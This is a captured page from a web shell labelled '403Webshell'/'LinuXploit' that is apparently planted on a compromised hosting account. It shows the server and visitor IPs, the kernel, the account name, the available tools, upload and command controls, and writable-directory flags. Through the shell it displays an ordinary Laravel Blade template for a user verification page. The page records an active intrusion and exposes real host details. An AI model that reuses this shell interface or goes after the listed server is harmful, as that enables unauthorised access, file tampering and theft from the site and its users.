403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.222.184.207
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/User/Views/frontend/verification/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/User/Views/frontend/verification/index.blade.php
@extends('layouts.user')

@section('content')
    <h2 class="title-bar">
        {{__("Verification data")}}
    </h2>
    @include('admin.message')
    <div class="booking-history-manager">
        @foreach($fields as $field)
            @switch($field['type'])
                @case("email")
                @include('User::frontend.verification.fields.email')
                @break
                @case("phone")
                @include('User::frontend.verification.fields.phone')
                @break
                @case("file")
                @include('User::frontend.verification.fields.file')
                @break
                @case("multi_files")
                @include('User::frontend.verification.fields.multi_files')
                @break
                @case('text')
                @default
                @include('User::frontend.verification.fields.text')
                @break
            @endswitch
        @endforeach
        <hr>
        <div class="row">
            <div class="col-md-3"></div>
            <div class="col-md-4">
                <a href="{{route('user.verification.update')}}" class="btn btn-warning"> <i class="fa fa-edit"></i> {{__("Update verification data")}} </a>
            </div>
        </div>
    </div>
@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit